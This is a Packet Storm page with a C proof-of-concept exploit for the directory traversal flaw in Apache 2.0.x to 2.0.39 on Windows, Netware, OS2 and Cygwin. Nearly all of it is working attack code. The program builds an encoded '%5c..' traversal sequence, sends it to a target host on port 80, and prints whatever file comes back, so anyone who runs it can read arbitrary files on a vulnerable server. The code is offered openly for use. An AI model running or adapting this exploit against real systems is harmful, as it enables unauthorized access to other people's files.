This Proof of Concept exploit for the current directory traversal design flaw in apache 2.0.x - 2.0.39 allows any attacker to view any file on the target machine. Original vulnerability found by Luigi Auriemma. Affected Systems: Windows [win32], Netware, OS2, Cygwin.
2ba457a832be506c17d2c9da5e1d72ab/*
* DSR-apache2.0x by bob@dtors.net
* Exploit found by Auriemma Luigi.
*
* This is Proof on Concept exploit for
* the current directory traversal design flaw
* in apache 2.0.x - 2.0.39.
*
* Affected Systems:
*
* Windows [win32]
* Netware
* OS2
* Cygwin
*
* This exploit allows the attacker to view ANY
* file on the target machine if it is vulnerable
* to this attack.
*
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define bs "%5c"
char travcode[]=
"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
"\x25\x35\x63";
void reply(int sock);
void reply(int sock)
{
int n;
char recvbuf[1024];
fd_set rset;
while (1) {
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(sock,&rset)) {
if((n=read(sock,recvbuf,1024)) <= 0) {
printf("Connection closed by foreign ghost.\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset)) {
if((n=read(STDIN_FILENO,recvbuf,1024)) > 0) {
recvbuf[n]=0;
//write(sock,recvbuf,n);
}
}
}
}
int main(int argc, char *argv[]) {
int sock;
char exp[1024];
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
fprintf(stdout, "\n\tDSR-apache2.0x.c By bob.\n");
fprintf(stdout, "Proof Of Concept Code for Apache 2.0.x 2.0.39\n");
fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");
if(argc<4)
{
fprintf(stderr, "\nUsage : %s <host> <dir> <file>\n\n", argv[0]);
exit(1);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "Cumon! Gimme some socks to put on!\n\n");
exit(1);
}
/* A fresh pair of clean socks ;) */
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
/* yummy fresh smelling */
fprintf(stdout, "Hold up bish connecting to host... \n");
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
fprintf(stderr, "My socks are all sweaty.\n");
exit(1);
}
else {
/* im exhausted after that...gn */
sleep(3);
sprintf(exp, "GET /error/%s%s%s%s HTTP/1.1\r\nHost: %s\r\n\r\n" ,travcode, argv[2], bs, argv[3], argv[1]);
write(sock,exp,strlen(exp));
fprintf(stdout, "This is not going to be pritty.\nIm a lion here me ROAR!\n\n");
reply(sock);
close(sock);
exit (0);
}
}
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!